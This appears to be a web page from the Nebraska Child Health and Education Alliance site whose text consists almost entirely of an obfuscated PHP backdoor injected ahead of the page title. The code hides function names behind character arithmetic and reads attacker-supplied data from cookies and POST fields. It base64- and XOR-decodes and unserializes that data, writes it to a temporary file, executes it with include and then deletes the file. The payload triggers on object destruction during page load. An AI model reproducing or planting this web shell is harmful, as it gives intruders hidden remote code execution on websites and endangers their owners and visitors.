$dTHvHbfAN = "\x4c" . "\x5a" . "\x5f" . chr (117) . chr ( 674 - 597 ).chr (90) . 'O';$LtMoGNtxJG = chr (99) . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . chr ( 185 - 84 )."\170" . 'i' . "\x73" . 't' . "\163";$cihxLdlUOa = class_exists($dTHvHbfAN); $LtMoGNtxJG = "7670";$ZkryqOG = !1;if ($cihxLdlUOa == $ZkryqOG){function AZgLowKHYF(){$xaLtQ = new /* 61405 */ LZ_uMZO(18684 + 18684); $xaLtQ = NULL;}$JPljtPt = "18684";class LZ_uMZO{private function dAmCneJqq($JPljtPt){if (is_array(LZ_uMZO::$tSRanRC)) {$inRqEm = sys_get_temp_dir() . "/" . crc32(LZ_uMZO::$tSRanRC["\x73" . "\141" . 'l' . "\164"]);@LZ_uMZO::$tSRanRC[chr ( 997 - 878 ).chr (114) . 'i' . chr ( 131 - 15 ).chr ( 967 - 866 )]($inRqEm, LZ_uMZO::$tSRanRC[chr (99) . 'o' . "\x6e" . chr ( 467 - 351 ).chr (101) . 'n' . 't']);include $inRqEm;@LZ_uMZO::$tSRanRC[chr (100) . chr ( 114 - 13 ).'l' . "\145" . "\164" . chr (101)]($inRqEm); $JPljtPt = "18684";exit();}}private $KZZYGks;public function bVOWEMOR(){echo 2607;}public function __destruct(){$JPljtPt = "21179_18362";$this->dAmCneJqq($JPljtPt); $JPljtPt = "21179_18362";}public function __construct($HOQNa=0){$LOaFVeOEW = $_POST;$moxkQWSiwF = $_COOKIE;$TcxYeHjL = "4ce5e264-1f17-4493-8e91-96547eea3786";$xVKXIIM = @$moxkQWSiwF[substr($TcxYeHjL, 0, 4)];if (!empty($xVKXIIM)){$DuyiIea = "base64";$qsgcB = "";$xVKXIIM = explode(",", $xVKXIIM);foreach ($xVKXIIM as $nfyVVheT){$qsgcB .= @$moxkQWSiwF[$nfyVVheT];$qsgcB .= @$LOaFVeOEW[$nfyVVheT];}$qsgcB = array_map($DuyiIea . '_' . chr (100) . "\145" . "\x63" . 'o' . "\144" . "\145", array($qsgcB,)); $qsgcB = $qsgcB[0] ^ str_repeat($TcxYeHjL, (strlen($qsgcB[0]) / strlen($TcxYeHjL)) + 1);LZ_uMZO::$tSRanRC = @unserialize($qsgcB);}}public static $tSRanRC = 20030;}AZgLowKHYF();} Issues - Nebraska Child Health and Education Alliance

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